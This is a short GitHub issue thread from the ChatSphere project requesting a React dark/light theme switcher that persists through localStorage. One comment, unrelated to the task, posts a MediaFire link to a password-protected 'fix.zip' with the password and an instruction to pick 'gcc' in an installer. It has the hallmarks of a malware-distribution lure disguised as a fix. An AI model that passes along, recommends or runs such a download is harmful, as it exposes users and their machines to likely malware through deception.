### ISSUE TITLE
Implement theme switcher

### ISSUE THREAD

**Issue by AnanyaPappula** [VedaVerse-opensource/chatsphere#6]
**Task Description:**
Develop a feature that allows users to toggle between dark and light modes. This toggle should be easily accessible and change the theme of the entire application.

**Details:**

- **React State Management:** Use React's state management to handle theme changes.
- **Persistence:** Ensure the theme preference is saved (e.g., using localStorage).
- **Reference:** Use the [Figma design](https://www.figma.com/design/6x6jrOQgfMoWWENXD9NFF0/ChatSphere?node-id=0-1&t=mNiBIXIcFv7HStX0-1) to understand the design of the toggle switch.

**Acceptance Criteria:**

- Toggle switch is visible and functional.
- Application theme changes correctly between dark and light modes.
- Theme preference persists across page reloads.

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sumirx** [comment]
Completed, Closing
